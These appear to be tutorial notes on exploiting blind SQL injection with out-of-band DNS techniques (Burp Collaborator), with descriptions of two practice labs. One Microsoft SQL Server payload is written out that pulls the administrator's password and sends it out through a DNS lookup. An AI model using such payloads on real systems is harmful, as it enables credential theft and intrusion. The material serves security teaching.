5. Out-of-band Application Security Techniques
Exploiting blind SQLi using Out-of-band Application Security Techniques (OAST)
An app might carry out a SLQ query asynchronously. The app continues processing the user’s request in the original thread, and uses another thread to execute a SQL query using the tracking cookie. They query is still vulnerable to SQLi, but none of the techniques described so far will work. The app’s response does not depend on the query returning any data, error messages, or on the time taken to execute the query.
In this situation, it is often possible to exploit the blind SQLi vulnerability by triggering out-of-band network interactions to a system that we control. These can be triggered based on an injected condition to infer info one piece at a time. More usefull, data can be exfiltrated directly within the network interaction.
A variety of network protocols can be used for this purpose, but typically the most effecting is DNS. Most productions networks allow free egress of DNS queries, because they are essential for the normal operation of production systems.
We can use Burp Collaborator for OAST techniques. This is a server that provides custom implementations of various network services, including DNS. It allows us to detect when network interactions occur as a result of sending invidual payloads to a vulnerable app. Burp Suite Pro includes a built-in client that’s configured to work with Burp Collaborator right out of the box.
The techniques for triggering a DNS query are specific to the type of database being used. For example, the following input on Microsoft SQL Server can be used to cause a DNS lookup on a specified domain:
This cause the database to perform a lookup for the following domain: 0efdymgw1o5w9inae8mg4dfrgim9ay.burpcollaborator.net. We can use Burp Collaborator to generate a unique subdomain and poll the Collaborator server to confirm when any DNS lookups occur.
Lab: Blind SQL injection with out-of-band interaction
Objective: This lab contains a blind SQLi. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie. The SQL query is executed asynchronously and has no effect on the application’s response. However, you can trigger out-of-band interactions with an external domain. To solve the lab, exploit the SQLi vulnerability to cause a DNS lookup to Burp Collaborator.
Note: To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator’s default public server: http://burpcollaborator.net/.
Burp Suite Professional is required for this lab.
Exploiting blind SQLi using OAST techniques
Having confirmed a way to trigger OAST interactions, you can then out-of-band channel to exfiltrate data from the vulnerable app. For example:
1
'; declare @p varchar(1024);set @p=(SELECT password FROM users WHERE username='Administrator');exec('master..xp_dirtree "//'+@p+'.cwcsgt05ikji0n1f2qlzn5118sek29.burpcollaborator.net/a"')--
This input reads the password for the Adminstrator users, appends a unique Collaborator subdomain, and triggers a DNS lookup. This lookup allows you to view the captured password: S3cure.cwcsgt05ikji0n1f2qlzn5118sek29.burpcollaborator.net. OAST are a powerful way to detect and exploit blind SQLi, due to the high chance of success and the ability to directly exfiltrate data with the out-of-band channel. For this reason, OAST are often preferable even in situations where other techniques for blind exploitation work.
Lab: Blind SQL injection with out-of-band data exfiltration
Objective: This lab contains a blind SQLi vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie. The SQL query is executed asynchronously and has no effect on the application’s response. However, you can trigger out-of-band interactions with an external domain. The database contains a different table called
users, with columns calledusernameandpassword. You need to exploit the blind SQLi vulnerability to find out the password of theadministratoruser. To solve the lab, log in as theadministratoruser.
Note: To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator’s default public server: http://burpcollaborator.net/.
Burp Suite Professional is required for this lab.